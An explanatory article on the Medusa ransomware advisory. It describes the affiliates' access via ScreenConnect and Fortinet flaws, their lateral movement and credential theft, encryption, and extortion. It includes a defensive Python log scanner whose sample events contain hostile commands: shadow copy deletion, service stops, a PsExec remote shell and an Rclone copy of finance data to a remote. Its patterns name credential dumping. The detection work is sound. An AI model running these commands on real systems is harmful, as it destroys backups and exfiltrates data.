Medusa Ransomware Crisis: 300 Major Organizations Under Siege

The FBI, along with the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC), has issued a serious warning about the Medusa ransomware. This cyberattack has already compromised over 300 organizations that provide essential services, including hospitals, schools, law firms, insurance companies, technology firms, and manufacturers.

Medusa is a type of ransomware-as-a-service (RaaS), which means that different cybercriminals can use it to launch attacks while its creators manage key aspects like ransom negotiations. The attackers use a “double extortion” strategy. First, they lock victims out of their own files by encrypting them. Then, they threaten to release the stolen data publicly if the victim does not pay the ransom. This method puts immense pressure on organizations to meet the hackers’ demands.

How Medusa Ransomware Works

Medusa ransomware first appeared in June 2021 and was originally run by a small group. It has since grown into an affiliate network in which different criminals pay to use it. The FBI's latest investigation, current as of February 2025, has revealed the methods these attackers use to break into computer systems.

Step 1: Getting Inside the System

Attackers working with Medusa often buy access to networks from “initial access brokers” (IABs). These brokers gain entry by tricking employees through fake emails (phishing) or by exploiting unpatched software vulnerabilities. Two security flaws that Medusa affiliates have been exploiting are:

  • CVE-2024-1709 – A security gap in ScreenConnect that allows attackers to bypass authentication.
  • CVE-2023-48788 – A weakness in Fortinet EMS that lets hackers sneak in using SQL injection attacks.

Step 2: Spying and Spreading Inside the Network

Once inside, Medusa’s operators try to blend in with normal computer activity. They use common Windows tools like PowerShell and the Command Prompt to avoid raising suspicion. To gather information about the system, they use software such as:

  • Advanced IP Scanner
  • SoftPerfect Network Scanner

Hackers also install remote access tools like AnyDesk, Atera, and ConnectWise. These programs help them stay inside the network for long periods without being noticed. Using Remote Desktop Protocol (RDP) and a tool called PsExec, they move across different computers within the organization.

One particularly dangerous tool they use is Mimikatz, which extracts credentials held in system memory. With those credentials they gain access to privileged accounts, making it far easier to take over the entire network.

Step 3: Stealing and Locking Data

Before locking files, Medusa’s attackers steal sensitive data using Rclone, a program that copies files to cloud storage. Then, they deploy a file-encrypting program called gaze.exe, which:

  • Encrypts all files with strong AES-256 encryption and adds a .medusa extension to them.
  • Shuts down key services like backups, security programs, and database systems to prevent recovery.
  • Deletes Volume Shadow Copies (the snapshots Windows keeps automatically), so files cannot be restored from those snapshots and recovery depends on the decryption key or on separate, offline backups.

After the encryption process, the hackers give victims 48 hours to respond. They force organizations to negotiate using Tor-based live chat or Tox messenger, which are anonymous communication platforms. If victims ignore them, the hackers go one step further and call or email them directly to demand payment.
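The behaviours listed in Steps 2 and 3 (scanner use, PsExec lateral movement, Rclone copies, service stops, shadow copy deletion) are all visible in process-creation telemetry. The following is an added detection example, not code from the advisory or from any vendor; the log lines are constructed in a simplified Sysmon/Event ID 4688 style, and the rule names and regexes are this example's own choices.

```python
import re

# Constructed sample process-creation events (Sysmon / 4688 style); not real logs.
SAMPLE_EVENTS = [
    r'host=FS01 user=CORP\svc_backup image=C:\Windows\System32\vssadmin.exe cmd="vssadmin delete shadows /all /quiet"',
    r'host=WS07 user=CORP\jdoe image=C:\Users\jdoe\Downloads\Advanced_IP_Scanner.exe cmd="Advanced_IP_Scanner.exe"',
    r'host=DC01 user=CORP\admin image=C:\Tools\PsExec.exe cmd="PsExec.exe \\FS01 -s cmd.exe"',
    r'host=FS01 user=CORP\admin image=C:\Temp\rclone.exe cmd="rclone.exe copy D:\Finance remote:bucket"',
    r'host=WS07 user=CORP\jdoe image=C:\Windows\System32\notepad.exe cmd="notepad.exe report.txt"',
    r'host=FS01 user=CORP\admin image=C:\Windows\System32\net.exe cmd="net stop SQLWriter"',
]

# One regex per behaviour the advisory attributes to Medusa affiliates (names are ours).
RULES = {
    "shadow_copy_deletion": re.compile(r"vssadmin(\.exe)?.*delete\s+shadows", re.I),
    "service_stop": re.compile(r"\bnet(1)?(\.exe)?\s+stop\b|\bsc(\.exe)?\s+stop\b", re.I),
    "psexec_lateral_movement": re.compile(r"psexe(c|svc)(\.exe)?", re.I),
    "rclone_exfil": re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I),
    "recon_scanner": re.compile(r"advanced_ip_scanner|netscan(\.exe)?", re.I),
    "credential_dumping": re.compile(r"mimikatz|sekurlsa::", re.I),
    "remote_access_tool": re.compile(r"anydesk|atera|connectwise|screenconnect", re.I),
}


def scan(events):
    """Return (rule_name, host, line) for every event that matches a rule."""
    hits = []
    for line in events:
        host = re.search(r"host=(\S+)", line)
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((name, host.group(1) if host else "?", line))
    return hits


def hosts_with_multiple_stages(hits, threshold=2):
    """Hosts on which several distinct stages fired: these warrant immediate escalation."""
    per_host = {}
    for name, host, _ in hits:
        per_host.setdefault(host, set()).add(name)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for name, host, line in found:
        print(f"[{name}] {host}: {line}")
    print("escalate:", hosts_with_multiple_stages(found))
```

A single hit (for example one scanner launch) may be legitimate admin work; the combination of exfiltration, service stops and shadow copy deletion on one host within a short window is the signal to act on.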

Medusa Ransomware: How Cybercriminals Exploit Vulnerabilities

Medusa operators maintain a secret website on the dark web, where they list their victims and show countdown timers that indicate when stolen data will be released. This puts extra pressure on organizations to pay. In some cases, even after victims pay the ransom, another criminal might claim that the first payment was stolen. These hackers then demand more money for the “real” decryption key, showing just how untrustworthy these ransom deals can be.

The FBI, CISA, and MS-ISAC strongly advise against paying ransom. There is no guarantee that victims will get their files back, and paying only encourages hackers to continue attacking other organizations. Instead, authorities urge companies to report any incidents immediately to the FBI’s Internet Crime Complaint Center (IC3), local FBI field offices, or CISA’s official reporting system.

Cyberattacks like Medusa ransomware pose a serious threat to public and private sectors. Organizations must stay alert, patch vulnerabilities, and educate employees to prevent falling victim to these increasingly aggressive cybercriminals.
